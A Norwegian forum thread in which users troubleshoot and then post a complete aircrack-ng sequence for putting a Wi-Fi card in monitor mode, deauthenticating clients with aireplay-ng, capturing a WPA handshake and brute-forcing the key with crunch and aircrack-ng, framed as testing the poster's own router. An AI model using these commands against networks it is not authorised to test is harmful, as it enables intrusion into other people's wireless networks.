Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
AbonnerSkjul
Host1.no - Webhotell fra 29,-, virtuell server fra 249,-. 15% rabatt med rabattkode "nFF". Besøk oss på Host1.no!
  3 1539
erlendraaland
4 0
31. august 2015
Hallo alle sammen. Er det noen hes som kunne hjulpet meg med en liten knipe, tror ikke det er noe vanskelig for Linux kyndige, det skal bare vare en komando som ikke er helt rett.

1- iwconfig - finne ut navn på nettkortet.
2- airmon-ng start wlan - sette wlan0 i monotory mode.
3- airodump-ng mon0 - Få opp listen over netverkene jeg har tilgang til.


4- nytt vindu airodump-ng -c 12 --bssid 00:11:22:33:44:55 --showack -w target-handshake mon0 - IKKE LUKK - får opp IP-adresse til ruteren jeg er ute etter.


5- nytt vindu aireplay-ng -o 5 -a 00:11:22:33:44:55 -c IP:bb:cc:dd:ee:ff mon0 (IKKE LUKK vent på handshake)
(Please specify an attack mode. "aireplay-ng --help" for help.)
Her må det være noe galt med komandoen. Denne skal koble seg
opp mot komando 4, der det jeg skal ende opp med ett handshake.

6- crunch 8 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567 89 | aircrack-ng –bssid 00:11:22:33:44:55 -w- target-handshake.cap
(Skjønner denne, har laget endel ordlister i Crunch tidligere og resten er vel rett fram).

Men får ikke komando 5 til å virke, det er noe jeg må ha skrevet feil.

Ordlisten skal selfølgelis forkortest, skal legge inn alle tall og bokstaver i passordet og en del ekstra og teste litt rundt.
Er forferdelig iriterende å ikke få det til, men regner med det bare er noe gale med komando 5.
SodomInsane^
Dataelektroniker
SodomInsane^'s Avatar
149 44
31. august 2015
Du har ikke spesifisert type angrep som skal brukes. I ditt tilfelle høres det ut som om du skal bruke deaut, da må du legge på optionen "-2" i tillegg til det andre.
Kilde: http://linux.die.net/man/1/aireplay-ng
Sist endret av SodomInsane^; 31. august 2015 kl. 07:21. Grunn: Retard typo.
erlendraaland
Trådstarter
4 0
31. august 2015
Tok en ny test med -2 som du la til, da kjørte komandoen. (brukte tilfeldige BSSID og IP-er bare som en test, den kjørte iallefall uten problem)

Setter igang airodump-ng -c 12 --bssid 00:11:22:33:44:55 --showack -w target-handshake mon0 i kveld.
Vil at det skal skje så realistisk som mulig, vist jeg forstår det rett må en klient koble seg opp mot ruteren for at jeg skal kunne se IP-en (ruter IP?)

I går fikk jeg opp mange ip adresser fra komando 4, men da fikk jeg ikke numer 5 til å virke.
Nå ser det ut som alt er i orden, så gleder meg til å teste, jeg kommer til å forkorte ordlisten drastisk, legge inn alle sifferene i WPS2 passordet mitt + ekstra og se hvor lang tid det tar, så teste videre etter ehvert.

Takk for hjelpen, jeg kommer tilbake vist jeg ikke får det til

root@SYSTEM:~# aireplay-ng -2 -o 5 -a A0:E4:CB:30:FA:CA -c 28:CF:E9:658:F3 mon0
No source MAC (-h) specified. Using the device MAC (34:21:09:0C:59:CF)
^Cad 343 packets...

Første forsøk. Her leser ded min egen mon0-IP siden jeg ikke har spesifisert med -h.


root@SYSTEM:~# aireplay-ng -2 -o 5 -a A0:E4:CB:30:FA:CA -h 28:CF:E9:658:F3 mon0
The interface MAC (34:21:09:0C:59:CF) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 28:CF:E9:658:F3
^Cad 87 packets...

Her bytter jeg ut -c med -h og det ser ut sm den leser riktig IP.
Den leser pakker men det kommer ikke noen godkjenning opp i airodump-ng vindue. Må det kjøre over lengre tid eller er det jeg som gjør noe galt?
Sist endret av erlendraaland; 1. september 2015 kl. 13:49. Grunn: Automatisk sammenslåing med etterfølgende innlegg.
▼ ... over en uke senere ... ▼
utepaanordnes2
14 0
12. september 2015
Fant løsningen.

airmon-ng check kill
airmon-ng start wlano
airodump-ng wlan0mon -w name -c 11

NEW TERMINAL:
aireplay-ng --deauth 0 -a [BSSID] wlan0mon
#waith for handshake in airodump window

NEW TERMINAL:
aircrack-ng name-01.cap
#check handshake(s)

WORDLIST CRACK:
aircrack-ng name-01.cap -w sample.list

CRACK ON THE FLY:
crunch 8 10 abc123,.-etc | aircrack-ng --bssid 1a:2b:3c:4d:5e:f6 -w- name-01.cap

prøvde på mitt eget netverk som har ett 10 sifret passord, jeg la inn bare de bokstavene og tallene passordet mitt innehold, i riktig rekkefølget:

crunch 10 10 ILDC537cIH | aircrack-ng a1:b2:c3:d4:e5:f6 -w- name01.cap

matten min er litt rusten, men tror det blir 10 opphøyd i 10, som blir max 99.999.999.999 koder å gå igjennom.
Sitter på en crap laptop som ikke regner mer en 800 koder i sekundet, jeg lot den stå en dag, og regner med det ville tatt
rundt en uke. Da kjenner jeg alle variablene.
Må vente til jeg får tilbake min egentlige lapptop, den regner mye kjappere.
Men har forstått at å bruteforce en ruter er ikke bare bare, da er det lettere å gå etter wps pin-koden